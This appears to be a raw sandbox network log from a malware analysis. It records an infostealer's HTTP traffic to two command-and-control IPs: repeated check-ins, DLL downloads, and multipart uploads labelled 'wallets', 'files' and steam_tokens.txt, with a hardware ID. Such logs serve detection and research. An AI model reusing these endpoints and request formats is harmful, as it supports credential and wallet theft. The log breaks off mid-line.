Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: GET /0d60be0de163924d/nss3.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 46 41 32 34 35 43 39 46 32 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CCFFA245C9F2FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 46 41 32 34 35 43 39 46 32 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CCFFA245C9F2FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 46 41 32 34 35 43 39 46 32 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CCFFA245C9F2FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: GET /0d60be0de163924d/softokn3.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 46 41 32 34 35 43 39 46 32 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CCFFA245C9F2FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: GET /0d60be0de163924d/vcruntime140.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HJDBKJKFIECAAAKFBFBFHost: 185.215.113.37Content-Length: 1067Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 46 41 32 34 35 43 39 46 32 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CCFFA245C9F2FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DBFHDBGIEBFIIDGCBFBKHost: 185.215.113.37Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 42 46 48 44 42 47 49 45 42 46 49 49 44 47 43 42 46 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 39 39 34 39 33 64 32 33 64 33 38 32 63 63 63 37 35 33 61 63 37 64 61 34 65 35 66 63 34 33 36 35 31 61 65 34 38 61 61 63 35 66 65 63 61 64 35 61 63 38 38 31 32 33 65 33 64 38 62 32 61 62 31 34 37 32 34 61 37 65 31 0d 0a 2d 2d 2d 2d 2d 2d 44 42 46 48 44 42 47 49 45 42 46 49 49 44 47 43 42 46 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 44 42 46 48 44 42 47 49 45 42 46 49 49 44 47 43 42 46 42 4b 2d 2d 0d 0a Data Ascii: ------DBFHDBGIEBFIIDGCBFBKContent-Disposition: form-data; name="token"399493d23d382ccc753ac7da4e5fc43651ae48aac5fecad5ac88123e3d8b2ab14724a7e1------DBFHDBGIEBFIIDGCBFBKContent-Disposition: form-data; name="message"wallets------DBFHDBGIEBFIIDGCBFBK--
Source: global traffic HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IDAEBGCAAECAKFHIIJDBHost: 185.215.113.37Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 44 41 45 42 47 43 41 41 45 43 41 4b 46 48 49 49 4a 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 39 39 34 39 33 64 32 33 64 33 38 32 63 63 63 37 35 33 61 63 37 64 61 34 65 35 66 63 34 33 36 35 31 61 65 34 38 61 61 63 35 66 65 63 61 64 35 61 63 38 38 31 32 33 65 33 64 38 62 32 61 62 31 34 37 32 34 61 37 65 31 0d 0a 2d 2d 2d 2d 2d 2d 49 44 41 45 42 47 43 41 41 45 43 41 4b 46 48 49 49 4a 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 79 62 6e 63 62 68 79 6c 65 70 6d 65 0d 0a 2d 2d 2d 2d 2d 2d 49 44 41 45 42 47 43 41 41 45 43 41 4b 46 48 49 49 4a 44 42 2d 2d 0d 0a Data Ascii: ------IDAEBGCAAECAKFHIIJDBContent-Disposition: form-data; name="token"399493d23d382ccc753ac7da4e5fc43651ae48aac5fecad5ac88123e3d8b2ab14724a7e1------IDAEBGCAAECAKFHIIJDBContent-Disposition: form-data; name="message"ybncbhylepme------IDAEBGCAAECAKFHIIJDB--
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 46 41 32 34 35 43 39 46 32 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CCFFA245C9F2FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DBGHDGHCGHCAAKFIIECFHost: 185.215.113.37Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 42 47 48 44 47 48 43 47 48 43 41 41 4b 46 49 49 45 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 39 39 34 39 33 64 32 33 64 33 38 32 63 63 63 37 35 33 61 63 37 64 61 34 65 35 66 63 34 33 36 35 31 61 65 34 38 61 61 63 35 66 65 63 61 64 35 61 63 38 38 31 32 33 65 33 64 38 62 32 61 62 31 34 37 32 34 61 37 65 31 0d 0a 2d 2d 2d 2d 2d 2d 44 42 47 48 44 47 48 43 47 48 43 41 41 4b 46 49 49 45 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 44 42 47 48 44 47 48 43 47 48 43 41 41 4b 46 49 49 45 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 44 42 47 48 44 47 48 43 47 48 43 41 41 4b 46 49 49 45 43 46 2d 2d 0d 0a Data Ascii: ------DBGHDGHCGHCAAKFIIECFContent-Disposition: form-data; name="token"399493d23d382ccc753ac7da4e5fc43651ae48aac5fecad5ac88123e3d8b2ab14724a7e1------DBGHDGHCGHCAAKFIIECFContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------DBGHDGHCGHCAAKFIIECFContent-Disposition: form-data; name="file"------DBGHDGHCGHCAAKFIIECF--
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BGDAAKJJDAAKFHJKJKFCHost: 185.215.113.37Content-Length: 265Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 47 44 41 41 4b 4a 4a 44 41 41 4b 46 48 4a 4b 4a 4b 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 39 39 34 39 33 64 32 33 64 33 38 32 63 63 63 37 35 33 61 63 37 64 61 34 65 35 66 63 34 33 36 35 31 61 65 34 38 61 61 63 35 66 65 63 61 64 35 61 63 38 38 31 32 33 65 33 64 38 62 32 61 62 31 34 37 32 34 61 37 65 31 0d 0a 2d 2d 2d 2d 2d 2d 42 47 44 41 41 4b 4a 4a 44 41 41 4b 46 48 4a 4b 4a 4b 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 42 47 44 41 41 4b 4a 4a 44 41 41 4b 46 48 4a 4b 4a 4b 46 43 2d 2d 0d 0a Data Ascii: ------BGDAAKJJDAAKFHJKJKFCContent-Disposition: form-data; name="token"399493d23d382ccc753ac7da4e5fc43651ae48aac5fecad5ac88123e3d8b2ab14724a7e1------BGDAAKJJDAAKFHJKJKFCContent-Disposition: form-data; name="message"files------BGDAAKJJDAAKFHJKJKFC--
Source: global traffic HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JEHDHIEGIIIDHIDHDHJJHost: 185.215.113.37Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 45 48 44 48 49 45 47 49 49 49 44 48 49 44 48 44 48 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 39 39 34 39 33 64 32 33 64 33 38 32 63 63 63 37 35 33 61 63 37 64 61 34 65 35 66 63 34 33 36 35 31 61 65 34 38 61 61 63 35 66 65 63 61 64 35 61 63 38 38 31 32 33 65 33 64 38 62 32 61 62 31 34 37 32 34 61 37 65 31 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 48 44 48 49 45 47 49 49 49 44 48 49 44 48 44 48 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 6b 6b 6a 71 61 69 61 78 6b 68 62 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 48 44 48 49 45 47 49 49 49 44 48 49 44 48 44 48 4a 4a 2d 2d 0d 0a Data Ascii: ------JEHDHIEGIIIDHIDHDHJJContent-Disposition: form-data; name="token"399493d23d382ccc753ac7da4e5fc43651ae48aac5fecad5ac88123e3d8b2ab14724a7e1------JEHDHIEGIIIDHIDHDHJJContent-Disposition: form-data; name="message"wkkjqaiaxkhb------JEHDHIEGIIIDHIDHDHJJ--
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 46 41 32 34 35 43 39 46 32 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CCFFA245C9F2FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 46 41 32 34 35 43 39 46 32 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CCFFA245C9F2FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 46 41 32 34 35 43 39 46 32 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CCFFA245C9F2FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DAKJDHIEBFIIDGDGDBAEHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 41 4b 4a 44 48 49 45 42 46 49 49 44 47 44 47 44 42 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 36 42 37 33 34 37 33 30 34 41 30 32 37 34 30 37 32 35 36 30 38 0d 0a 2d 2d 2d 2d 2d 2d 44 41 4b 4a 44 48 49 45 42 46 49 49 44 47 44 47 44 42 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 61 76 65 0d 0a 2d 2d 2d 2d 2d 2d 44 41 4b 4a 44 48 49 45 42 46 49 49 44 47 44 47 44 42 41 45 2d 2d 0d 0a Data Ascii: ------DAKJDHIEBFIIDGDGDBAEContent-Disposition: form-data; name="hwid"B6B7347304A02740725608------DAKJDHIEBFIIDGDGDBAEContent-Disposition: form-data; name="build"save------DAKJDHIEBFIIDGDGDBAE--
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 46 41 32 34 35 43 39 46 32 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CCFFA245C9F2FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 46 41 32 34 35 43 39 46 32 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CCFFA245C9F2FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 46 41 32 34 35 43 39 46 32 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CCFFA245C9F2FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 46 41 32 34 35 43 39 46 32 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CCFFA245C9F2FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 46 41 32 34 35 43 39 46 32 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: 